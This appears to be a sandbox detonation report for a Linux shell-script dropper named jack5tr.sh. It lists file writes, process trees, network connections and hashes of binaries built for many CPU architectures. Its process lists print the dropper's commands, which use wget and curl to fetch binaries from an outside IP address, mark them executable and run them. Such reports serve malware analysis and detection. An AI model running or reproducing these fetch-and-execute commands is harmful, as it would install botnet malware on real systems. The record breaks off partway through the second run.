| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RUN | /tmp/jack5tr.sh | N/A |
cURL User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
Processes
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/wget
[wget http://193.37.59.116/x86]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/usr/bin/cat
[cat x86]
/usr/bin/chmod
[chmod +x RUN gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mips]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x RUN gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arc]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/usr/bin/cat
[cat arc]
/usr/bin/chmod
[chmod +x RUN arc gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/x86_64]
/usr/bin/curl
[curl -O http://193.37.59.116/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x RUN arc gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mpsl]
/usr/bin/curl
[curl -O http://193.37.59.116/mpsl]
/usr/bin/cat
[cat mpsl]
/usr/bin/chmod
[chmod +x RUN arc gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm]
/usr/bin/curl
[curl -O http://193.37.59.116/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x RUN arc arm gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm5]
/usr/bin/curl
[curl -O http://193.37.59.116/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm6]
/usr/bin/curl
[curl -O http://193.37.59.116/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm7]
/usr/bin/curl
[curl -O http://193.37.59.116/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/ppc]
/usr/bin/curl
[curl -O http://193.37.59.116/ppc]
/usr/bin/cat
[cat ppc]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl ppc snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/spc]
/usr/bin/curl
[curl -O http://193.37.59.116/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl ppc snap-private-tmp spc systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/m68k]
/usr/bin/curl
[curl -O http://193.37.59.116/m68k]
/usr/bin/cat
[cat m68k]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh m68k mips mpsl ppc snap-private-tmp spc systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/sh4]
/usr/bin/curl
[curl -O http://193.37.59.116/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh m68k mips mpsl ppc sh4 snap-private-tmp spc systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
Files
/tmp/x86
| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
| SHA512 | ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66 |
/tmp/mips
| MD5 | 038943a024bba0e623ee0fc71c0e9dc4 |
| SHA1 | daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b |
| SHA256 | 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb |
| SHA512 | 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07 |
/tmp/arc
| MD5 | 154506d20dcd8502b3820a2912b697e9 |
| SHA1 | 55c207a1c0aeabc6df6d0307f11a03137139d701 |
| SHA256 | 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c |
| SHA512 | aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112 |
/tmp/x86_64
| MD5 | 74eff98ceea934700653d0c0620419f8 |
| SHA1 | 037df252464667dbcdc6f4fde3ff9043a3b76909 |
| SHA256 | 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89 |
| SHA512 | 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c |
/tmp/mpsl
| MD5 | eba2a5a74d5beba7b9f903cfe07f9796 |
| SHA1 | 012af86b452d7e7f82bbd45b5bbef672d2b25c67 |
| SHA256 | 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea |
| SHA512 | a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be |
/tmp/arm
| MD5 | 6b1fc0e45d31470659fe0e295bc63d4e |
| SHA1 | ce54569f5eefe03f56d5df2df3fe4830b0c9f177 |
| SHA256 | 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22 |
| SHA512 | f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea |
/tmp/arm5
| MD5 | fc7db008f770f37ccb16e8d23f9780ae |
| SHA1 | acd2865df9fec74fdafb227ce3136b715bb998b0 |
| SHA256 | 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db |
| SHA512 | c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c |
/tmp/arm6
| MD5 | d6227412be050807781b974181739db6 |
| SHA1 | 14d20849fc59a62ed7f713afda3d9dda4cc2c850 |
| SHA256 | e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09 |
| SHA512 | 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76 |
/tmp/arm7
| MD5 | d0084c21e35f40b71450406d0298e622 |
| SHA1 | f2ce386f6ba9afdb7f95272ab867c913b0802cd9 |
| SHA256 | 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f |
| SHA512 | 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727 |
/tmp/ppc
| MD5 | 9b27ba0a33c0ecaf4c48bc1fdabf2538 |
| SHA1 | d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266 |
| SHA256 | 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618 |
| SHA512 | 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea |
/tmp/spc
| MD5 | 839129f80935155dff6a2db49753d6a9 |
| SHA1 | d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba |
| SHA256 | 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457 |
| SHA512 | ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3 |
/tmp/m68k
| MD5 | e6391e323b334b1257f36bb2fcb34e25 |
| SHA1 | 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41 |
| SHA256 | 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728 |
| SHA512 | b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958 |
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
| SHA512 | b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-29 19:31
Reported
2024-08-29 19:37
Platform
debian12-armhf-20240221-en
Max time kernel
8s
Max time network
310s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/RUN | /tmp/jack5tr.sh | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/spc | /usr/bin/curl | N/A |
Processes
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/usr/bin/cat
[cat x86]
/usr/bin/chmod
[chmod +x jack5tr.sh RUN systemd-private-95ee504168b8491395abd7d23b35057c-logrotate.service-4xrxzy systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x jack5tr.sh mips RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/usr/bin/cat
[cat arc]
/usr/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/mpsl]
/usr/bin/cat
[cat mpsl]
/usr/bin/chmod
[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
